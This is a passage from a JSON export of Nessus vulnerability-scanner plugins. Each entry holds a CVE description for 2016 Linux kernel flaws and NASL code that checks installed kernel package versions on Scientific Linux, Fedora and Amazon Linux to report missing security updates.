packet\n socket (requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the system.\n (CVE-2016-8655, Important)\n\n - A flaw was discovered in the Linux kernel's\n implementation of VFIO. An attacker issuing an ioctl can\n create a situation where memory is corrupted and modify\n memory outside of the expected area. This may overwrite\n kernel memory and subvert kernel execution.\n (CVE-2016-9083, Important)\n\n - The use of a kzalloc with an integer multiplication\n allowed an integer overflow condition to be reached in\n vfio_pci_intrs.c. This combined with CVE-2016-9083 may\n allow an attacker to craft an attack and use unallocated\n memory, potentially crashing the machine.\n (CVE-2016-9084, Moderate)", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-03-03T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20170302)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083"], "modified": "2017-03-03T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20170302_KERNEL_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/97516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97516);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20170302)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - Linux kernel built with the Kernel-based Virtual Machine\n (CONFIG_KVM) support is vulnerable to a NULL pointer\n dereference flaw. It could occur on x86 platform, when\n emulating an undefined instruction. An attacker could\n use this flaw to crash the host kernel resulting in DoS.\n (CVE-2016-8630, Important)\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets\n implementation in the Linux kernel networking subsystem\n handled synchronization while creating the TPACKET_V3\n ring buffer. A local user able to open a raw packet\n socket (requires the CAP_NET_RAW capability) could use\n this flaw to elevate their privileges on the system.\n (CVE-2016-8655, Important)\n\n - A flaw was discovered in the Linux kernel's\n implementation of VFIO. An attacker issuing an ioctl can\n create a situation where memory is corrupted and modify\n memory outside of the expected area. This may overwrite\n kernel memory and subvert kernel execution.\n (CVE-2016-9083, Important)\n\n - The use of a kzalloc with an integer multiplication\n allowed an integer overflow condition to be reached in\n vfio_pci_intrs.c. This combined with CVE-2016-9083 may\n allow an attacker to craft an attack and use unallocated\n memory, potentially crashing the machine.\n (CVE-2016-9084, Moderate)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1703&L=scientific-linux-errata&F=&S=&P=761\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0ecfa446\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.10.2.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.10.2.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:01", "description": "The 4.8.8 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.8.7 kernel rebase contains new hardware support, additional\nfeatures, and a number of important bug fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-25T00:00:00", "title": "Fedora 23 : kernel (2016-ee3a114958)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-8645"], "modified": "2016-11-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-EE3A114958.NASL", "href": "https://www.tenable.com/plugins/nessus/95308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-ee3a114958.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95308);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-8630\", \"CVE-2016-8645\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"FEDORA\", value:\"2016-ee3a114958\");\n\n script_name(english:\"Fedora 23 : kernel (2016-ee3a114958)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.8.8 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.8.7 kernel rebase contains new hardware support, additional\nfeatures, and a number of important bug fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-ee3a114958\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-8630\", \"CVE-2016-8645\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-ee3a114958\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.8.8-100.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:19:29", "description": "CVE-2016-8645 kernel: a BUG() statement can be hit in\nnet/ipv4/tcp_input.c\n\nIt was discovered that the Linux kernel since 3.6-rc1 with\nnet.ipv4.tcp_fastopen; set to 1 can hit BUG() statement in\ntcp_collapse() function after making a number of certain syscalls\nleading to a possible system crash.\n\nCVE-2016-8655 kernel: Race condition in packet_set_ring leads to use\nafter free\n\nA race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system.\n\nCVE-2016-9083 kernel: State machine confusion bug in vfio driver\nleading to memory corruption\n\nA flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution.\n\nCVE-2016-9084 kernel: Integer overflow when using kzalloc in vfio\ndriver\n\nThe use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. This combined\nwith CVE-2016-9083 may allow an attacker to craft an attack and use\nunallocated memory, potentially crashing the machine.", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "title": "Amazon Linux AMI : kernel (ALAS-2016-772)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655", "CVE-2016-9084", "CVE-2016-9083", "CVE-2016-8645"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-doc", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:kernel-headers", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-772.NASL", "href": "https://www.tenable.com/plugins/nessus/95609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2016-772.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95609);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/04/11 17:23:06\");\n\n script_cve_id(\"CVE-2016-8645\", \"CVE-2016-8655\", \"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"ALAS\", value:\"2016-772\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2016-772)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2016-8645 kernel: a BUG() statement can be hit in\nnet/ipv4/tcp_input.c\n\nIt was discovered that the Linux kernel since 3.6-rc1 with\nnet.ipv4.tcp_fastopen; set to 1 can hit BUG() statement in\ntcp_collapse() function after making a number of certain syscalls\nleading to a possible system crash.\n\nCVE-2016-8655 kernel: Race condition in packet_set_ring leads to use\nafter free\n\nA race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets implementation in the Linux kernel\nnetworking subsystem handled synchronization while creating the\nTPACKET_V3 ring buffer. A local user able to open a raw packet socket\n(requires the CAP_NET_RAW capability) could use this flaw to elevate\ntheir privileges on the system.\n\nCVE-2016-9083 kernel: State machine confusion bug in vfio driver\nleading to memory corruption\n\nA flaw was discovered in the Linux kernel's implementation of VFIO. An\nattacker issuing an ioctl can create a situation where memory is\ncorrupted and modify memory outside of the expected area. This may\noverwrite kernel memory and subvert kernel execution.\n\nCVE-2016-9084 kernel: Integer overflow when using kzalloc in vfio\ndriver\n\nThe use of a kzalloc with an integer multiplication allowed an integer\noverflow condition to be reached in vfio_pci_intrs.c. This combined\nwith CVE-2016-9083 may allow an attacker to craft an attack and use\nunallocated memory, potentially crashing the machine.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-772.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update kernel' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"kernel-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-debuginfo-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"i686\", reference:\"kernel-debuginfo-common-i686-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-devel-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-doc-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-headers-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-debuginfo-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"kernel-tools-devel-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-4.4.35-33.55.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perf-debuginfo-4.4.35-33.55.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-i686 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:14:33", "description": "The 4.8.6 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-11-08T00:00:00", "title": "Fedora 24 : kernel (2016-96d276367e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9084", "CVE-2016-9083"], "modified": "2016-11-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-96D276367E.NASL", "href": "https://www.tenable.com/plugins/nessus/94617", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-96d276367e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94617);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9083\", \"CVE-2016-9084\");\n script_xref(name:\"FEDORA\", value:\"2016-96d276367e\");\n\n script_name(english:\"Fedora 24 : kernel (2016-96d276367e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.8.6 